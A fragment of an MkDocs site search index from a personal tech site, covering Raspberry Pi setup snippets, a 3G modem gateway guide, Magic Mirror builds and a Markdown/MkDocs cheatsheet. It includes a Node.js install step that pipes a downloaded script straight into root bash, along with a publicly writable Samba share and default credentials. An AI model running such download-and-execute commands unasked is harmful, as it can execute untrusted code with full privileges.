", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#contributors", "title": "Contributors", "text": "Thanks to Boris Berman for the script rewrite from function to classes
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/snippets/", "title": "Snippets", "text": "", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#enable-ssh-on-raspberry-pi-without-a-screen", "title": "Enable SSH on Raspberry Pi Without a Screen", "text": "Put the micro SD card into your computer You'll have to locate the boot directory at your SD card
for example:
cd /Volumes/boot\n
All you have to do is create an empty file called ssh.
touch ssh\n
That's it. Insert the SD card to the Pi. You should have enabled SSH at boot.
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#default-user-and-password-after-installation", "title": "Default User and Password After Installation", "text": "User: pi\nPassword: raspberry\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#basic-configuration", "title": "Basic Configuration", "text": "sudo raspi-config\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#update-os", "title": "Update OS", "text": "sudo apt-get update && sudo apt-get upgrade -y\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#disable-ipv6-on-raspberry-pi-os", "title": "Disable IPv6 on Raspberry Pi Os", "text": "Edit \u201c/etc/sysctl.conf\u201d:
sudo nano /etc/sysctl.conf\n
Add this to the end:
net.ipv6.conf.all.disable_ipv6=1\nnet.ipv6.conf.default.disable_ipv6=1\nnet.ipv6.conf.lo.disable_ipv6=1\nnet.ipv6.conf.eth0.disable_ipv6 = 1\n
Save and close the file. Edit \u201c/etc/rc.local\u201d:
sudo nano /etc/rc.local\n
Add this to the end (but before \u201cexit 0\u201d):
systemctl restart procps\n
Save and close the file. Reboot
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#show-raspberry-temperature", "title": "Show Raspberry Temperature", "text": "/opt/vc/bin/vcgencmd measure_temp\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/snippets/#samba-for-raspberrypi", "title": "Samba for RaspberryPi", "text": "sudo apt-get update\nsudo apt-get install -y samba samba-common-bin smbclient cifs-utils\nsudo smbpasswd -a pi ( my-pi-samba-remote-password )\nsudo nano /etc/samba/smb.conf\n
change:
workgroup = YOUR WINDOWS WORKGROUP NAME\n
add at end:
[share]\npath = /home/pi/Desktop/share\n available = yes\n valid users = pi\n read only = no\n browsable = yes\n public = yes\n writable = yes\n
the shared path must exist: ( if you work via desktop ( HDMI or VNC ) it is very convenient just to read or drop from/to this shared dir ) mkdir /home/pi/Desktop/share
sudo reboot\n
Start samba Server
sudo /usr/sbin/service smbd start\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/guides/3g-modem-host/", "title": "3g Modem Host Configuration", "text": "Install ubuntu server for raspberrypi using Raspberry Pi Imager{}
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#packages-installation", "title": "Packages Installation", "text": "apt install -y ppp curl wget git dnsutils whois net-tools htop gcc libusb-1.0-0-dev iptables-persistent isc-dhcp-server\n
After the install add a symlink
ln -s /usr/include/libusb-1.0/libusb.h /usr/include/libusb.h\n
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#sakis3g-script-installation", "title": "sakis3g Script Installation", "text": "Clone, Compile, and copy to /usr/bin/
git clone https://github.com/Trixarian/sakis3g-source.git\ncd sakis3g-source\n./compile\ncp build/sakis3gz /usr/bin/sakis3g\n
Create new script for auto connect
nano /usr/bin/sakis3gConnect.sh\n
Note
interactive connect (for testing) bash sakis3g --interactive
Copy the following
#!/bin/bash\n\n/usr/bin/sakis3g start USBINTERFACE=\"5\" APN=\"vob3g\" APN_USER=\" \" APN_PASS=\" \"\n
Note
When APN credentials are epmpy, APN_USER and APN_PASS should be a string with a space
Add executable permissions
chmod +x sakis3gConnect.sh\n
Run the script sakis3gConnect.sh
You should have a new interface ppp0
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#configuring-dhcp-server", "title": "Configuring DHCP Server", "text": "!! info The following configuration assumes use of eth0 interface for the DHCP
Edit
nano /etc/default/isc-dhcp-server\n
Add the following to the end of the config
INTERFACESv4=\"eth0\"\nINTERFACESv6=\"eth0\"\n
Edit
nano /etc/dhcp/dhcpd.conf\n
Change the following options to (you can choose the name servers you use):
option domain-name \"local\";\noption domain-name-servers 8.8.8.8;\ndefault-lease-time 600;\nmax-lease-time 7200;\nddns-update-style none;\nauthoritative;\n
Append the DHCP Network config to the end of the file (Change for your need):
subnet 192.168.20.0 netmask 255.255.255.0 {\nrange 192.168.20.5 192.168.20.30;\noption routers 192.168.20.1;\noption domain-name-servers 8.8.8.8, 8.8.4.4;\n}\n
Save & Exit
run
echo 1 > /proc/sys/net/ipv4/ip_forward\n
Edit
nano /etc/sysctl.conf\n
Change the following option
net.ipv4.ip_forward=1\n
Restart and Test
service isc-dhcp-server restart\nservice isc-dhcp-server status\n
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#configure-static-ip-for-the-th0-interface-dhcp", "title": "Configure static ip for the th0 Interface & DHCP", "text": "edit:
/etc/netplan/50-cloud-init.yaml\n
network:\n ethernets:\n eth0:\n addresses: [192.168.20.1/24]\ngateway4: 192.168.20.1\n nameservers:\n addresses: [1.1.1.1, 8.8.8.8]\nversion: 2\n
After reboot you should connet to the new static ip
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#lets-route-all-the-trafic-to-new-interface-with-iptables", "title": "Lets route all the trafic to new interface with Iptables", "text": "iptables -F\niptables --table nat --append POSTROUTING --out-interface ppp0 -j MASQUERADE\niptables --append FORWARD --in-interface eth0 -j ACCEPT\n
Save the rules
iptables-save > /etc/iptables/rules.v4\nip6tables-save > /etc/iptables/rules.v6\n
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/guides/3g-modem-host/#cron-examples", "title": "Cron examples", "text": "@reboot sleep 20 && /usr/bin/sakis3gConnect.sh\n*/5 * * * * /usr/bin/sakis3gConnect.sh\n
", "tags": ["raspberry-pi", "3g-modem"]}, {"location": "raspberry-pi/projects/magic-mirror-v2/", "title": "Magic Mirror 2.0", "text": "To be honest, it's not my first time building a Magic Mirror project. My first magicmirror can be found here. The Magic Mirror 2.0 is based on Raspberry Pi 4 with Docker Container.
", "tags": ["raspberry-pi", "magicmirror"]}, {"location": "raspberry-pi/projects/magic-mirror-v2/#references", "title": "References", "text": "magicmirror.builders official website. khassel's magicmirror docker image documentation website.
", "tags": ["raspberry-pi", "magicmirror"]}, {"location": "raspberry-pi/projects/magic-mirror-v2/#the-build-process", "title": "The Build Process", "text": "I had dead iMac 2011 27\" with 2k display. I've managed to use it's LCD panel with this product from AliExpress. It actually a full controller for the specific LCD panel, including the inverter for backlight. Basically, it's a full-fledged LCD Monitor with HDMI we need for the Raspberry Pi 4.
I've decided to test the controller for the LCD Panel inside the original iMac's body.
I've connected raspberry to the new monitor for the magicmirror testing and configuration.
Since my previous experience with my first magicmirror build, I've decided to add a Motion Sensor to the Raspberry Pi to detect the movement of the person infront of the mirror and turn the display on/off accordingly. The second thing i've added is a Power Button to turn the Raspberry Pi on, off and restart it without a physical access to the Raspberry Pi.
I couldn't find any open source projects for the functionality I needed of the power button and the Motion Sensor. So I've decided to create my own solution. Bellow are the scripts that I've created:
External Power Button Wake/Power Off/Restart Motion Sensor Display Control Thats how i've tested the functionality of the power button and the motion sensor.
I've order a reflective glass with 4 holes for mounting. It was a challenge to find a suitable reflective glass for the MagicMirror. The product I've found is not perfect - the glass is tinted, but it's a good enough solution and way better then Glass Mirror Films I've used on my first Magic Mirror Project.
After I've done all the proof of concepts
that every thing will work as i intended, I've continue to build the frame to house all the components.
I've used scrap wood I had laying around to build the frame and the mounting for the LCD panel, and the glass
For mounting the Magic Mirror to the wall i've used the smallest TV Mount I've found.
After the frame is built, I've added the electronics to the frame.
Performing senity check on the electronics, and display assembly.
Since I when on the floating
effect the glass isn't covering the all the frame, all the exposed parts of the glass are needed to be covered to avoid light leaking.
And the final Magic Mirror on the wall.
", "tags": ["raspberry-pi", "magicmirror"]}, {"location": "raspberry-pi/projects/magic-mirror-v2/#the-software", "title": "The Software", "text": "The magicmiror is based on MagicMirror project. running on docker on Raspberry OS.
Below the docker compose file for your reference.
version: '3'\n\nservices:\n magicmirror:\n image: karsten13/magicmirror\n container_name: magicmirror\n hostname: magicmirror\n restart: always\n ports:\n - 80:8080\n volumes:\n - ./config:/opt/magic_mirror/config\n - ./modules:/opt/magic_mirror/modules\n - ./css:/opt/magic_mirror/css\n - /tmp/.X11-unix:/tmp/.X11-unix\n - /opt/vc:/opt/vc/:ro\n - /sys:/sys\n - /usr/bin/vcgencmd:/usr/bin/vcgencmd\n - /etc/localtime:/etc/localtime\n devices:\n - /dev/vchiq\n environment:\n - LD_LIBRARY_PATH=/opt/vc/lib\n - DISPLAY=unix:0.0\n - TZ=Asia/Jerusalem\n - SET_CONTAINER_TIMEZONE=true\n - CONTAINER_TIMEZONE=Asia/Jerusalem\n shm_size: '1024mb'\n command:\n - npm\n - run\n - start\n
", "tags": ["raspberry-pi", "magicmirror"]}, {"location": "raspberry-pi/projects/magic-mirror/", "title": "Magic Mirror", "text": "", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#magic-mirror-build-pictures", "title": "Magic Mirror Build Pictures", "text": "23\" Samsung screen power resoldering:
Wooden frame initial fitting test on a glass with duel mirror film applied:
Testing the screen installation (frame removed) with power cords:
Testing black&white picture from a laptop after frame assembly:
Power, Lan, Usb external ports cutouts:
Fitted extended ports with wood filler:
Extended ports:
Assembly With screen, Raspberry Pi, cable routing, black material which do not pass light where there is no screen:
Adding some color for the frame:
Testing everything is working as it should be:
Full assembly behind the mirror:
Final Product:
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#configuration-setup", "title": "Configuration Setup", "text": "", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#change-display-rotation", "title": "Change Display Rotation", "text": "sudo nano /boot/config.txt\n
Add one of those according to your setup to the config file:
Code Description display_rotate=0 Normal display_rotate=1 90 degrees display_rotate=2 180 degrees display_rotate=3 270 degrees display_rotate=0x8000 horizontal flip display_rotate=0x20000 vertical flip NOTE: You can rotate both the image and touch interface 180\u00ba by entering lcd_rotate=2 instead
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#disabling-the-screensaver", "title": "Disabling the Screensaver", "text": "Change to OPEN GL Driver
sudo nano /boot/config.txt\n
add this:
dtoverlay=vc4-fkms-v3d\n
(Please note, you will need the x11-xserver-utils package installed.)
edit ~/.config/lxsession/LXDE-pi/autostart:
sudo nano ~/.config/lxsession/LXDE-pi/autostart\n
Add the following lines:
@xset s noblank\n@xset s off\n@xset -dpms\n
Edit /etc/lightdm/lightdm.conf:
sudo nano /etc/lightdm/lightdm.conf\n
Add the following line below [SeatDefaults]
xserver-command=X -s 0 -dpms\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#os-ui-finishes", "title": "OS UI Finishes", "text": "Make the Background Black:
Right click the Desktop
-> Desktop Preferences
and Change: Layout -> no image
Colour -> #000000
Hit ok.
Right click on the top panel
-> Panel Preferences
-> Appearance
Select Solid Color (With Opacity)
make sure Opacity at 0
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#disable-wifi-power-save", "title": "Disable WiFi Power Save", "text": "Edit /etc/modprobe.d/8192cu.conf
sudo nano /etc/modprobe.d/8192cu.conf\n
Add the following lines
# Disable power saving\noptions 8192cu rtw_power_mgnt=0 rtw_enusbss=1 rtw_ips_mode=1\n
For Raspberry Pi 3 Edit /etc/network/interfaces
sudo nano /etc/network/interfaces\n
Add the following line under the wlan0 section
allow-hotplug wlan0\niface wlan0 inet manual\nwpa-conf /etc/wpa_supplicant/wpa_supplicant.conf\nwireless-power off\n
Reboot your PI
sudo reboot\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#disable-cursor-on-startup", "title": "Disable Cursor on Startup", "text": "sudo apt-get install unclutter\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#installation", "title": "Installation", "text": "first install node.js and npm
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -\nsudo apt-get install -y nodejs\n
and then run:
sudo npm install -g npm@latest\n
If you need to remove node and npm run this:
sudo apt-get remove nodejs nodejs-legacy nodered\n
Installation:
magicmirror-installation
say no to PM2 auto start - will be install manually
To Start from SSH:
cd ~/MagicMirror && DISPLAY=:0 npm start\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#pm2-auto-start-installation", "title": "pm2 auto start installation", "text": "sudo npm install -g pm2\ncd ~\nnano mm.sh\n
add this to mm.sh and save:
#!/bin/sh\n\ncd ~/MagicMirror\nDISPLAY=:0 npm start\n
chmod +x mm.sh\npm2 start mm.sh\npm2 save\npm2 startup\n
pm2 commands:
pm2 restart mm\npm2 stop mm\npm2 start mm\npm2 log\npm2 show mm\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "raspberry-pi/projects/magic-mirror/#logrotate-installation", "title": "Logrotate Installation", "text": "This will Retain for 14 days compress the logs.
pm2 install pm2-logrotate\npm2 set pm2-logrotate:compress true\npm2 set pm2-logrotate:retain 14\npm2 set pm2-logrotate:max_size 10M\n
", "tags": ["raspberry-pi", "magic-mirror"]}, {"location": "utilities/htpasswd-generator/", "title": "htpasswd Password Generator", "text": "This htpasswd password encryption applet is written in JavaScript, so the entire process runs within your browser.Nothing is transmitted to any server, we take your privacy and securityserious.
", "tags": ["htpasswd"]}, {"location": "utilities/htpasswd-generator/#credit-sources", "title": "Credit & Sources", "text": "The code was built by macminiosx and cloned from his repository. It was slightly modified to fit this website.
", "tags": ["htpasswd"]}, {"location": "utilities/useful-links-tools/", "title": "Useful Links & Tools", "text": "Services Description Mail-Tester.com Tests the quality of emails ipleak.net Shows Information About Your IP sslLabs.com Test Your SSL Certification ifconfig.io curl ifconfig.io DSL Reports.com Speedtest For QoS Best Configuration Hurricane Electric Free DNS Hosting Free DNS & DDNS Service freedns.afraid.org Free DNS & DDNS Service", "tags": ["utilities"]}, {"location": "utilities/wifiQrGenerator/", "title": "Wifi QR Image Generator", "text": "", "tags": ["utilities"]}, {"location": "utilities/wifiQrGenerator/#description", "title": "Description", "text": "This will generate a QR code what can be used with any iOS/Android device to access a given Wifi without manually adding a network and password. Just scan the QR Code and you are connected. This is a fully static code - no data is send to any server!
", "tags": ["utilities"]}, {"location": "utilities/wifiQrGenerator/#generator", "title": "Generator", "text": "", "tags": ["utilities"]}, {"location": "utilities/wifiQrGenerator/#credit-sources", "title": "Credit & Sources", "text": "This code was taken from this site qistoph Github Page. It was fully reviewed for any malicious code or functionality and slightly modified to fit this site
", "tags": ["utilities"]}, {"location": "utilities/browsers-extensions/chrome/", "title": "Chrome Extensions", "text": "List of extensions for Chrome browser.
Chrome Extensions Description 1Password Password Manager (Desktop App Required) Clear Browsing Data Clear Browsing Data HTTPS Everywhere Automatically use HTTPS Pushbullet Connectivity App uBlock Origin Ad Block EditThisCookie Edit cookie per page Wappalyzer Uncovers the technologies used on websites IP Address and Domain Information Find detailed information about each IP address JSON viewer Pretty print / display JSON content in the browser", "tags": ["chrome", "extensions"]}, {"location": "utilities/browsers-extensions/firefox/", "title": "Firefox Extensions", "text": "List of extensions for Firefox browser.
Firefox Extensions Description FoxyProxy Proxy Management Wappalyzer Identifies software on websites Clear Browsing Data Delete browsing data 1Password Password Manager", "tags": ["firefox", "extensions"]}, {"location": "utilities/markdown-cheatsheet/about/", "title": "About Markdown", "text": "Markdown is a lightweight markup language with plain text formatting syntax. It is designed so that it can be converted to HTML and many other formats using a tool by the same name. Markdown is often used to format readme files, for writing messages in online discussion forums, and to create rich text using a plain text editor. As the initial description of Markdown contained ambiguities and unanswered questions, many implementations and extensions of Markdown appeared over the years to answer these issues.
This Page is fully written with Markdown Language and converted to HTML
", "tags": ["markdown-cheatsheet", "mkdocs"]}, {"location": "utilities/markdown-cheatsheet/about/#material-for-mkdocs-markdown", "title": "Material for MkDocs Markdown", "text": "This website is built with MkDocs. MkDocs is a static site generator that can be used to generate websites with a clean and simple user interface. It is a free and open source project.
Warning
Most of the advanced features used to generate this website and the Markdown syntax used from Material Theme for MkDocs and may not apply to other websites.
", "tags": ["markdown-cheatsheet", "mkdocs"]}, {"location": "utilities/markdown-cheatsheet/admonition/", "title": "Markdown Admonitions", "text": "Admonitions, also known as call-outs, are an excellent choice for including side content without significantly interrupting the document flow. Material for MkDocs provides several different types of admonitions and allows for the inclusion and nesting of arbitrary content.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#usage", "title": "Usage", "text": "Admonitions follow a simple syntax: a block starts with !!!
, followed by a single keyword used as a [type qualifier]. The content of the block follows on the next line, indented by four spaces:
Admonition!!! note\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Note
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#changing-the-title", "title": "Changing The Title", "text": "By default, the title will equal the type qualifier in titlecase. However, it can be changed by adding a quoted string containing valid Markdown (including links, formatting, ...) after the type qualifier:
Admonition with custom title!!! note \"Phasellus posuere in sem ut cursus\"\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Phasellus posuere in sem ut cursus
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#removing-the-title", "title": "Removing The Title", "text": "Similar to [changing the title], the icon and title can be omitted entirely by adding an empty string directly after the type qualifier. Note that this will not work for [collapsible blocks]:
Admonition without title!!! note \"\"\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#collapsible-blocks", "title": "Collapsible Blocks", "text": "When [Details] is enabled and an admonition block is started with ???
instead of !!!
, the admonition is rendered as a collapsible block with a small toggle on the right side:
Admonition, collapsible??? note\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Note Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Adding a +
after the ???
token renders the block expanded:
Admonition, collapsible and initially expanded???+ note\n\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod\n nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor\n massa, nec semper lorem quam in massa.\n
Note Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/admonition/#supported-types", "title": "Supported Types", "text": "Following is a list of type qualifiers provided by Material for MkDocs, whereas the default type, and thus fallback for unknown type qualifiers, is note
:
note
Note
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
abstract
, summary
, tldr
Abstract
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
info
, todo
Info
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
tip
, hint
, important
Tip
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
success
, check
, done
Success
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
question
, help
, faq
Question
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
warning
, caution
, attention
Warning
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
failure
, fail
, missing
Failure
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
danger
, error
Danger
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
bug
Bug
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
example
Example
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
quote
, cite
Quote
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
", "tags": ["markdown-cheatsheet", "mkdocs", "admonition"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/", "title": "Mkdocs Awesome Pages Plugin", "text": "An MkDocs plugin that simplifies configuring page titles and their order
The awesome-pages plugin allows you to customize how your pages show up the navigation of your MkDocs without having to configure the full structure in your mkdocs.yml. It gives you detailed control using a small configuration file directly placed in the relevant directory of your documentation. MkDocs Awesome Pages Plugin Github Repository
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#features", "title": "Features", "text": "", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#customize-navigation", "title": "Customize Navigation", "text": "Create a file named .pages
in a directory and use the nav
attribute to customize the navigation on that level. List the files and subdirectories in the order that they should appear in the navigation.
nav:\n- subdirectory\n- page1.md\n- page2.md\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#rest", "title": "Rest", "text": "Pages or sections that are not mentioned in the list will not appear in the navigation. However, you may include a ...
entry to specify where all remaining items should be inserted.
nav:\n- introduction.md\n- ...\n- summary.md\n
Furthermore, it is possible to filter the remaining items using glob patterns or regular expressions. For example to match only the Markdown files starting with introduction-
.
nav:\n- ... | introduction-*.md\n- ...\n- summary.md\n
Note: The pattern is checked against the basename (folder- / filename) of remaining items - not their whole path.
For more details refer to the Rest Filter Patterns section below.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#titles", "title": "Titles", "text": "You can optionally specify a title for the navigation entry.
nav:\n- ...\n- First page: page1.md\n
Note: Specifying a title for a directory containing a .pages
file that defines a title
has no effect.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#links", "title": "Links", "text": "You can also use the nav
attribute to add additional links to the navigation.
nav:\n- ...\n- Link Title: https://lukasgeiter.com\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#sections", "title": "Sections", "text": "You can group items by creating new sections.
nav:\n- introduction.md\n- Section 1:\n- page1.md\n- page2.md\n- Section 2:\n- ...\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#change-sort-order", "title": "Change Sort Order", "text": "Create a file named .pages
in a directory and set the order
attribute to asc
or desc
to change the order of navigation items.
order: desc\n
Note: Unlike the default order, this does not distinguish between files and directories. Therefore pages and sections might get mixed.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#natural-sort-type", "title": "Natural Sort Type", "text": "Create a file named .pages
in a directory and set the sort_type
attribute to natural
to use natural sort order.
This can be combined with order
above.
sort_type: natural\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#order-navigation-by-preference", "title": "Order Navigation By Preference", "text": "Create a file named .pages
in a directory and set the order_by
attribute to filename
or title
to change the order of navigation items.
order_by: title\n
This can be combined with order
and/or sort_type
above. If order
is not set it will order ascending. If no preference is set, it will order by filename.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#collapse-single-nested-pages", "title": "Collapse Single Nested Pages", "text": "Note: This feature is disabled by default. More on how to use it below
If you have directories that only contain a single page, awesome-pages can \"collapse\" them, so the folder doesn't show up in the navigation.
For example if you have the following file structure:
docs/\n\u251c\u2500 section1/\n\u2502 \u251c\u2500 img/\n\u2502 \u2502 \u251c\u2500 image1.png\n\u2502 \u2502 \u2514\u2500 image2.png\n\u2502 \u2514\u2500 index.md # Section 1\n\u2514\u2500 section2/\n\u2514\u2500 index.md # Section 2\n
The pages will appear in your navigation at the root level:
Instead of how MkDocs would display them by default:
Section 1 Index Section 2 Index ", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#for-all-pages", "title": "For all pages", "text": "Collapsing can be enabled globally using the collapse_single_pages
option in mkdocs.yml
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#for-a-sub-section", "title": "For a sub-section", "text": "If you only want to collapse certain pages, create a file called .pages
in the directory and set collapse_single_pages
to true
:
collapse_single_pages: true\n
You may also enable collapsing globally using the plugin option and then use the .pages
file to prevent certain sub-sections from being collapsed by setting collapse_single_pages
to false
.
Note: This feature works recursively. That means it will also collapse multiple levels of single pages.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#for-a-single-page", "title": "For a single page", "text": "If you want to enable or disable collapsing of a single page, without applying the setting recursively, create a file called .pages
in the directory and set collapse
to true
or false
:
collapse: true\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#hide-directory", "title": "Hide Directory", "text": "Create a file named .pages
in a directory and set the hide
attribute to true
to hide the directory, including all sub-pages and sub-sections, from the navigation:
hide: true\n
Note: This option only hides the section from the navigation. It will still be included in the build and can be accessed under its URL.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#set-directory-title", "title": "Set Directory Title", "text": "Create a file named .pages
in a directory and set the title
to override the title of that directory in the navigation:
title: Page Title\n
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#arrange-pages", "title": "Arrange Pages", "text": "Deprecated: arrange
will be removed in the next major release - Use nav
instead.
Create a file named .pages
in a directory and set the arrange
attribute to change the order of how child pages appear in the navigation. This works for actual pages as well as subdirectories.
title: Page Title\narrange:\n- page1.md\n- page2.md\n- subdirectory\n
If you only specify some pages, they will be positioned at the beginning, followed by the other pages in their original order.
You may also include a ...
entry at some position to specify where the rest of the pages should be inserted:
arrange:\n- introduction.md\n- ...\n- summary.md\n
In this example introduction.md
is positioned at the beginning, summary.md
at the end, and any other pages in between.
", "tags": ["template", "markdown"]}, {"location": "utilities/markdown-cheatsheet/awesome-pages/#combine-custom-navigation-file-structure", "title": "Combine Custom Navigation & File Structure", "text": "MkDocs gives you two ways to define the structure of your navigation. Either create a custom navigation manually in mkdocs.yml
or use the file structure to generate the navigation. This feature makes it possible to combine both methods. Allowing you to manually define parts of your navigation without having to list all files.
Note: You can freely combine this with all the other features of this plugin. However they will only affect the part of the navigation that is not defined manually.
Use the nav
entry in mkdocs.yml
to define the custom part of your navigation. Include a ...
entry where you want the navigation tree of all remaining pages to be inserted.
The following examples are based on this file structure:
docs/\n\u251c\u2500 introduction.md\n\u251c\u2500 page1.md\n\u251c\u2500 page2.md\n\u2514\u2500 folder/\n\u251c\u2500 introduction.md\n\u251c\u2500 page3.md\n\u2514\u2500 page4.md\n
If you wanted introduction.md
, page1.md
and page2.md
to appear under their own section you could do this:
nav:\n- Start:\n- page1.md\n- page2.md\n- summary.md\n- ...\n
Which would result in the following navigation:
Start Introduction Page 1 Page 2 Folder Introduction Page 3 Page 4 The ...
entry can also be placed at a deeper level:
nav:\n- page1.md\n- Rest:\n- ...\n
Which would result in the following navigation:
